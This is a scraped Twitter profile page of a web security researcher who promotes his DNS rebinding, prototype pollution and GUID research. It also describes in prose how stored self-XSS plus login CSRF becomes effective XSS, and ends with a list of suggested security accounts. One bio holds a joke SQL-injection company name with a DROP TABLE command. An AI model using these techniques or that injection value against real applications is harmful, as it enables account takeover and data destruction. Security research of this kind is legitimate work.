Daniel Thatcher @_danielthatcher
Researcher, and security person at @intruder_io. Hack dumber. He/him blog.long.lat Joined June 2018-
Tweets36
-
Followers654
-
Following257
-
Likes129
And here’s part 2, presenting new techniques for reliable, split-second DNS rebinding in Chrome and Safari intruder.io/research/split…
Here's part 1, detailing how I hacked my company's own product using DNS rebinding: intruder.io/research/we-ha…
@sudhanshur705 @strellic This can work at times, and I mention something similar in the next part (coming soon), though in most of the real-world webapps I've seen driving headless browsers there is a timeout enforced by the app which you can't lengthen this way.
Here's part 1, detailing how I hacked my company's own product using DNS rebinding: intruder.io/research/we-ha…
Excited to be talking about new DNS rebinding techniques at @BlackHatEvents #BHEU next week. The research for this talk will be released in 2 parts on the @intruder_io research blog - keep an eye out for part 1 on Thursday tinyurl.com/bdzxesd3
Part 2 will be release on Wednesday, when I'm presenting the research at BHEU
@BlackHatEvents @intruder_io I've been asked to hold off on the release of the first part until tomorrow, so sorry for the false alarm!
Excited to be talking about new DNS rebinding techniques at @BlackHatEvents #BHEU next week. The research for this talk will be released in 2 parts on the @intruder_io research blog - keep an eye out for part 1 on Thursday tinyurl.com/bdzxesd3
@BlackHatEvents Whenever I try to submit my proposal, I get a 403 Forbidden. Is there anything I can do?
A while ago I decided to try take on a big challenge and work out how to detect prototype pollution black-box. One thing I’m very happy with from this research is the simplicity of the solution I found
Prototype pollution can be a dangerous bug, but it's hard to detect in real-world scenarios without the source code. In the latest blog, our researcher, @_danielthatcher, discusses a new technique for detecting prototype pollution in black-box situations:hubs.li/Q01Cs9L70
Why do I know so many Dan's in infosec? Is there something about the name Dan? I strongly advise being cautious of your data around anyone named Dan, until we work this out.
@PortSwiggerRes Thanks for sharing
The technique isn’t new, but the vast majority of pentesters I’ve spoken to don’t know about it, so I thought it worth sharing with an example from a pentest. I’ve also created a tool to help you exploit this issue github.com/intruder-io/gu…
As a newbie pentester I read the RFC for GUIDs out of a fear that I wasn’t testing them correctly. A few years later, it paid off.
GUIDs are everywhere - but there are hidden dangers when using them as they're designed for their uniqueness, not their security. Find out more in the latest blog from our research team: hubs.li/Q01pyz_r0 #guid #vulnerabilityscanning #CyberSecMonth
I was lucky enough to catch this talk at BH, and it was one of the highlights of the conference for me. Great research, and really well presented
Just finished ElectroVolt talk at #DEFCON30. Was super glad to see the entire room full. Thanks a lot for coming AND supporting! ⚡️ Hope you enjoyed the talk and can use the knowledge in your day to day work. Feel free to check out electrovolt.io for POCs. #DC
@notdurson Dan is also a wonderful person. It was a lot of fun. Hopefully we see each other again next year
Heading off to Vegas for the first time. If you see me about, say hi. I’m the lanky blond British guy with round black glasses.
@notdurson @BlackHatEvents Sounds good. I’ll message you
If you only need to read info rather than modify it, then the trick of loading the application in two separate iFrames works well. @iamnoooob writes about it here: blog.noob.ninja/escalating-low… @avlidienbrunn has a great talk on this and other tricks: youtube.com/watch?v=l3yThC…
This example works by using the self-XSS to set a session cookie with a limited path so that the self-XSS will still load when the victim logs back into their account. The self-XSS can then access the rest of the application as the victim, so is effectively regular XSS.
If you have stored self-XSS and login CSRF you can probably do something interesting, but you have to do slightly more than this tip says. Here's an example I put together against Moodle a few years ago: blog.long.lat/2019/04/09/obt…
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙♂️ #bugbounty #bugbountytips 👇
James Kettle @albinowax
83K Followers 102 Following Director of Research at @PortSwigger aka @Burp_Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
Gareth Heyes \u2028 @garethheyes
38K Followers 1K Following JavaScript for hackers: Learn to think like a hacker. https://t.co/e0aNEbEDk5
Hacking Articles @hackinarticles
297K Followers 477 Following House of Pentesters Join us: https://t.co/Y6XOlSOA92
sw33tLie @sw33tLie
10K Followers 946 Following Web application hacker, 25yo. Top 30 @ https://t.co/wX0yr85Tzk https://t.co/ZI7a8oJJcQ https://t.co/LGYK7tMOGo
harsh raj @harsh38raj
0 Followers 64 Following
Agentify @agentify_uy
102 Followers 60 Following Agentify AI - Agentes de Inteligencia Artificial para tu negocio.
Ali Shan @ali_shann__
0 Followers 140 Following Student of Computer Science || Vulnerbility resercher
to^ @nguyendt016
149 Followers 211 Following Security Engineer at @calif_io | CTF player in @r3kapig
Sean @SeanSneakly
0 Followers 50 Following
Balú @RaulPastor7
110 Followers 429 Following
0xadt204 @0xadt204
3 Followers 475 Following
Mr. @al1k0k
68 Followers 2K Following
saifuddine @saifuddineX
129 Followers 571 Following Site Reliability Engineer "SRE" at a smart office furniture company | MIS Student | Bug Bounty Hunter | Tech Enthusiast | مصري | مسلم ـــــــ تحيا مصر 🇪🇬
N𝔸𝕍ⒺεŇ @Asympt0t3
78 Followers 2K Following 73 110 102 111 115 101 99 32 71 117 121 | 𝕋𝕙𝕖 ℂ𝕦𝕣𝕖 𝕗𝕠𝕣 𝔹𝕠𝕣𝕖𝕕𝕠𝕞 𝕀𝕤 ℂ𝕦𝕣𝕚𝕠𝕤𝕚𝕥𝕪. 𝕋𝕙𝕖𝕣𝕖 𝕀𝕤 ℕ𝕠 ℂ𝕦𝕣𝕖 𝕗𝕠𝕣 ℂ𝕦𝕣𝕚𝕠𝕤𝕚𝕥𝕪.🙂
Hadid @hadid028
0 Followers 128 Following
quanauq_ @quanauq_
0 Followers 187 Following
9MF @n1neMF
81 Followers 5K Following
AbuMuslim (أبومُ... @m19o__
10K Followers 3K Following Security Philosopher, Organizer @BSides_ABQ, Board Member @OWASPEgypt. R&D @aivillage_dc. YT @CyberDose_ Coffee++
Dijkstra Hoare @dijkstrasghosty
9 Followers 2K Following A Wannabe 🦀er | “Uncompromising safety isn't a limitation; it's the genesis of true freedom in complexity.” - Some Rust Bro Somewhere
N_1 @dd404x
14 Followers 234 Following
silentwarrior60 @silentwarrior60
116 Followers 6K Following
Ismail Arabi @IsmailArabi18
73 Followers 2K Following
︎ @0xocdsec
4K Followers 8K Following ︎ 🏴☠️ 🇪🇺 💚 🇺🇦 | computers & features | 💚 🏴☠️ party | 603,628 km² https://t.co/F5dgX7AEoL
usama1912 @usama1912
0 Followers 190 Following
Vaisov Bek @vaisovbek
814 Followers 7K Following Security Researcher aka Bug Bounty Hunter | CTF Player
Mahmoud Ashraf @Mhmud_Ashraf
3 Followers 77 Following
Johnny @Luckyrocky2028
249 Followers 7K Following Stay Hungry, Stay Foolish. Only those who are self-disciplined can attain true freedom.|No Politics.
Austin Born @austinbuilds
178 Followers 367 Following Lead AI Engineer @actual_ai_ | Founder @shinzolabs
Intigriti @intigriti
209K Followers 666 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Ben Sadeghipour @NahamSec
247K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Sam Curry @samwcyo
101K Followers 1K Following
James Kettle @albinowax
83K Followers 102 Following Director of Research at @PortSwigger aka @Burp_Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
shubs @infosec_au
58K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnote
Gareth Heyes \u2028 @garethheyes
38K Followers 1K Following JavaScript for hackers: Learn to think like a hacker. https://t.co/e0aNEbEDk5
PortSwigger Research @PortSwiggerRes
120K Followers 7 Following Web security research from the team at @PortSwigger
Bug Bounty Reports Ex... @gregxsunday
54K Followers 613 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
Katie Paxton-Fear @InsiderPhD
97K Followers 2K Following Dr, apparently. Security Adovcate @semgrep & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/her
Nate @nnwakelam
43K Followers 1K Following
JS0N Haddix @Jhaddix
176K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Nicolas Grégoire @Agarri_FR
28K Followers 628 Following Web hacker and Burp Suite Pro trainer Refer to https://t.co/D5tRH7U2hg for trainings Follow @MasteringBurp for free tips and tricks
Julien | MrTuxracer �... @MrTuxracer
39K Followers 443 Following Founder of @rcesecurity | #BugBounty | @Hacker0x01 MVH && H1-Elite | $1,5+ Mio in Bounties | Mobile Hacker | @[email protected]
STÖK ✌️ @stokfredrik
138K Followers 1K Following Hi.. im that hacker / creative that your friends told you about.,
bugcrowd @Bugcrowd
199K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
Yassine Aboukir 🐐 @Yassineaboukir
33K Followers 411 Following HackerOne Top 40, Elite, Pentest Lead, Ambassador, x2 MVH Title, $1 million bounties and ex- Hacker Advisory Board • Digital Nomad/Hybrid Athlete/Surfer
zseano @zseano
81K Followers 713 Following #1 Amazon Hacker on a break from hacking. busy rebuilding bugbountyhunter and making bug bounties a better place for hackers
Soroush Dalili @irsdl
20K Followers 940 Following Hacker (ethical), web appsec specialist, trainer, tools builder & apps breaker 🕸️https://t.co/YipuTcYnWc🥷 🍏A dad-joke maker🍐
Luke Stephens (hakluk... @hakluke
100K Followers 2K Following Hacker, marketer. I manage socials and marketing for cybersecurity orgs. Founder of @hacker_content and @haksecio
Soren Iverson @soren_iverson
290K Followers 128 Following Idea guy. Building @iverson and @stompersapp
Timo Lo(n)gin @timolongin
380 Followers 34 Following Currently pwning elderly Internet protocols Mastodon: @[email protected]
Sebas @0xroot
4K Followers 466 Following - 🦊 Senior Security Consultant at @BishopFox - 📚 Curated Security Pills Newsletter https://t.co/c1XhZLXTZS
Ishai Shotten @popcornic
62 Followers 1K Following It's good to be the best, it's best to be the first
Azeria @Fox0x01
121K Followers 618 Following Sneaky bit flipper | CEO @azeria_labs | Author of “Arm Assembly Internals & RE” @BlueFoxBook | Adjunct Professor @SAISHopkins | Forbes 30u30
Eduardo Vela @sirdarckcat
13K Followers 614 Following not mad. mentally divergent. personal profile, opinions my own. everything I say is probably wrong. @Google
daniel:// stenberg:// @bagder
58K Followers 525 Following Typos and segfaults. I write curl. On team @wolfSSL. I don't know anything. @[email protected] My weekly email: https://t.co/9UYYYMLWaw
404 Media @404mediaco
37K Followers 13 Following a journalist-founded tech outlet here to fuck up the internet.
arxenix @ankursundara
1K Followers 712 Following i like web & browser bugs | ctf w/ @dicegangctf @ProjectSEKAIctf | security consultant @LeviathanSec | he/him
ProjectDiscovery @pdiscoveryio
42K Followers 144 Following Real, exploitable vulnerabilities. No noise. Nuclei scans fast. Neo closes the loop. @pdnuclei × @neo_ai_engineer
chompie @chompie1337
89K Followers 1K Following hacker, exploit developer/weird machine mechanic head of X-Force Offensive Research (XOR) @IBM
Agustín @acangiani
235 Followers 3K Following
Ben @fullstackpotato
60 Followers 749 Following A full stack potato that tries to do some security. @[email protected]
Ben Cox (EOL @benjojo... @Benjojo12
9K Followers 249 Following Hope you never notice the outages I cause. Knows where the RFC2616 bodies are buried. @recursecenter SP'2 18 Also @[email protected]
Daniel Cuthbert @dcuthbert
33K Followers 2K Following Documentary photographer, old creaky hacker. Co-author of @OWASP ASVS standard. Blackhat/Brucon Review Board & Co_chair UK Gov Cyber Security Advisory Board
Samuel Pritchard @samrpritchard
80 Followers 172 Following
Rogues Village @RoguesVillage
2K Followers 41 Following Rogues Village hosts talks and workshops looking at security questions through non-traditional lenses.
Aaditya Purani @aaditya_purani
7K Followers 916 Following Sr. SecEng @awscloud - Security Lead for Bedrock/Mantle. CTFs with @pb_ctf. DEFCON & BHUSA speaker. My opinions are my own. Ex-@Tesla @bishopfox @PaloAltoNtwks
Rachel Tobac @RachelTobac
112K Followers 8K Following Friendly Hacker & CEO @SocialProofSec security awareness/social engineering prevention Training, Videos, Talks | 3X @DEFCON🥈| Ex CISA gov Tech Advisory Council
Whiskey Pirate Crew @WhiskeyHackers
6K Followers 49 Following Hackers, Enthusiasts, Pirates. We are not “badgelife.” Always uncensored. All cool people welcome.
rxgamble @rxgamble
9K Followers 987 Following Gina Fiore. Gambler, writer. I wrote a book about my life and beating silly casino games. ADVANTAGE PLAYER 10.27.26 📕 ♣️ 🇵🇸
Quantum Village @quantum_village
1K Followers 104 Following Come engage, explore, and discuss the future quantum technologies! Discord: https://t.co/6gp2BcgIxK
Skytalks @dcskytalks
7K Followers 147 Following A ‘sub-conference’ that gives a unique platform for researchers to share their research, for angry hackers to rant about issues in the industry off-the-record
Jeff Moss @thedarktangent
104K Followers 8 Following https://t.co/fgXNGNt7gm Abandoned this site in 2022 but hopeful for the future of social media. Consider migrating to Mastodon DEFCON.socal
Kim Zetter @KimZetter
94K Followers 3K Following Journalist - cyber/national security. Author - COUNTDOWN TO ZERO DAY: Stuxnet and the Launch of the World's First Digital Weapon. https://t.co/334DzfSL1f
Ivan Fratric 💙💛 @ifsecure
19K Followers 209 Following Tech lead and security researcher at Google Project Zero. Author: Jackalope, TinyInst, WinAFL, Domato. PhD. Tweets are my own. Backup @[email protected]
sm0hk @sm0hk_713
4 Followers 47 Following
Vic: UK Edition @VicHarkness
2K Followers 724 Following I like birds, photography, and tech. @BSidesBSK organiser, @DefConScavHunt judge. @vicsfolklore alt. Occasional 🇺🇦 supply runner. Mainly shitposts. She/her
Curt @CurtBarnard
439 Followers 495 Following Sometimes I talk about computers. https://t.co/lQqeEELwk9
mopman @mopman
621 Followers 1K Following chaotic good hacker of computers who adheres to the common stereotypes of people who are hackers of computers. Once-MD of ; DROP TABLE "Companies"; Ltd
sysengineer @_sysengineer
28K Followers 959 Following I do not give Facebook permission to print anything off my computer
Not on here anymore, ... @malwaretech
30K Followers 2 Following No longer using Twitter. Check out https://t.co/BYnF2Aml7H for where to find me.
Internal Tech Emails @TechEmails
595K Followers 889 Following Internal tech industry emails that surface in public records. 🔍
🏳️⚧️Graph... @GraphCrimes
101K Followers 634 Following Graph High Crimes & Misdemeanors | I barely stick to gimmick be warned | She/her
TryHackMe @tryhackme
305K Followers 83 Following An online platform that makes it easy to break into and upskill in cyber security, all through your browser.
Hack The Box @hackthebox_eu
246K Followers 228 Following Cyber Mastery: Community Inspired. Enterprise Trusted.
Madhu Akula @madhuakula
4K Followers 1K Following Pragmatic Security Leader | Startup Advisor, Author, Speaker & Trainer @ BlackHat, DEFCON, USENIX, OWASP, SANS #Security, #CloudNative, #Kubernetes, #OpenSource
Ray [REDACTED] @RayRedacted
61K Followers 8K Following Hacker, Researcher, Podcast Producer (Tribe of Hackers, Darknet Diaries). Proud dad of the fastest climber in the world. Ever. “Ut scandis, alios subleva”
gafnit @gafnitav
1K Followers 60 Following
Andy Hornegold @AndyHornegold
32 Followers 461 Following Product Lead @intruder_io 🚀. Rooted in Red Teaming. Fascinated by elegance in code, infrastructure and 🏍️ . Go Fast. Opinions are my own.
Kuba Gretzky @mrgretzky
17K Followers 754 Following Creator of Evilginx - Reverse Proxy Phishing Framework for Red Teams: https://t.co/hPg644CTnM
Harsh Jaiswal @rootxharsh
22K Followers 1K Following Building @hacktronai | researching at @httpvoid0x2f | auditing at @cure53berlin | prev @zomato @vimeo @pdiscoveryioTrends for United States
You might like
